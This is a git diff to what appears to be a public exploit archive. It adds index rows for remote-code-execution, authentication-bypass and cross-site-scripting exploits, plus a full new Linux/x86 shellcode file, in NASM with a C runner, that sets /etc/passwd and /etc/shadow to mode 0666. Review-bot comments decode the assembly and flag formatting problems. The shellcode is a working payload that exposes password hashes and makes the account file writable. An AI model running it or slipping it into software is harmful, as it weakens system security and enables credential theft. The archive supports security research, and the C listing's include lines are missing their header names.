 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17544,6 +17546,7 @@ id,file,description,date,author,type,platform,port
 47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080
 47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25
 47080,exploits/unix/remote/47080.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",2019-07-07,"Brian Peters",remote,unix,80
+47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41485,3 +41488,8 @@ id,file,description,date,author,type,platform,port
 47075,exploits/php/webapps/47075.txt,"Karenderia Multiple Restaurant System 5.3 - Local File Inclusion",2019-07-05,"Mehmet EMIROGLU",webapps,php,
 47078,exploits/php/webapps/47078.txt,"WordPress Plugin Like Button 1.6.0 - Authentication Bypass",2019-07-08,"Benjamin Lim",webapps,php,80
 47106,exploits/aspx/webapps/47106.txt,"Sitecore 9.0 rev 171002 - Persistent Cross-Site Scripting",2019-07-11,"Owais Mehtab",webapps,aspx,443
+47107,exploits/hardware/webapps/47107.txt,"Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting",2019-07-12,ABDO10,webapps,hardware,80
+47109,exploits/php/webapps/47109.txt,"MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting",2019-07-12,"Metin Yunus Kandemir",webapps,php,80
+47110,exploits/java/webapps/47110.py,"Sahi Pro 8.0.0 - Remote Command Execution",2019-07-12,AkkuS,webapps,java,
+47111,exploits/java/webapps/47111.txt,"Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting",2019-07-12,"Ishaq Mohammed",webapps,java,
+47112,exploits/cgi/webapps/47112.py,"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution",2019-07-12,"Chris Lyne",webapps,cgi,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index f13582632..edd836b99 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
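Review bot: The port column of the five webapps rows added in this hunk is filled inconsistently: 47107 and 47109 carry `80`, while 47112 — whose script builds its target as `'https://' + args.t` — and 47110, which takes the target port as an argument, leave the column empty, as does 47111. Either record a port for every web entry or for none of them, so the column stays usable as a filter when the index is searched; the rows just above (47078 with `80`, 47106 with `443`, 47075 empty) show the same drift already exists in the file.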
@@ -987,3 +987,4 @@ id,file,description,date,author,type,platform
 47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
+47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/47108.txt b/shellcodes/linux_x86/47108.txt
new file mode 100644
index 000000000..e465d6cba
--- /dev/null
+++ b/shellcodes/linux_x86/47108.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow (61 bytes)
+# Date: 10/07/2019
+# Exploit Author: Xavier Invers Fornells
+# Contact: x4v1s3c@gmail.com
+# Tested on: Debian 4.19.28
+# Architecture: x86
+# Size: 61 bytes
+
+
+
+#################################### chmod.nasm ####################################
+
+global _start
+section .text
+
+_start:
+ push byte 15
+ pop eax
+ push byte 0x64
+ push word 0x7773
+ push 0x7361702f
+ push 0x6374652f
+ mov ebx, esp
+
+ push word 0x1b6
+ pop ecx
+
+ int 0x80
+
+ push byte 15
+ pop eax
+ push byte 0x77
+ push word 0x6f64
+ push 0x6168732f
+ push 0x6374652f
+ mov ebx, esp
+
+ push word 0x1b6
+ pop ecx
+
+ int 0x80
+
+ push byte 1
+ pop eax
+ int 0x80
+
+#################################### shellcode.c ####################################
+
+#include
+#include
+
+unsigned char code[] = \
+"\x6a\x0f\x58\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x0f\x58\x6a\x77\x66\x68\x64\x6f\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80";
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
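Review bot: The nasm listing carries no comments, so a reader has to decode every immediate by hand to confirm it matches the title: `push byte 15` / `pop eax` selects syscall 15 (chmod on 32-bit Linux), the four pushes before each `mov ebx, esp` spell `/etc/passwd` and `/etc/shadow` on the stack, `push word 0x1b6` / `pop ecx` is mode 0666 in octal, and the closing `push byte 1` / `pop eax` / `int 0x80` is exit. One `;` comment per group (for example `; eax = 15 (chmod)`, `; ecx = 0666`, `; exit(…)`) would make the listing self-explanatory and let a reviewer check the 61-byte string against it. In shellcode.c the two `#include` lines have lost their header names in this rendering (the calls shown need `stdio.h` and `string.h`), and `main()` without a return type is implicit-int, which C99 and later compilers reject; `int main(void)` is the portable form.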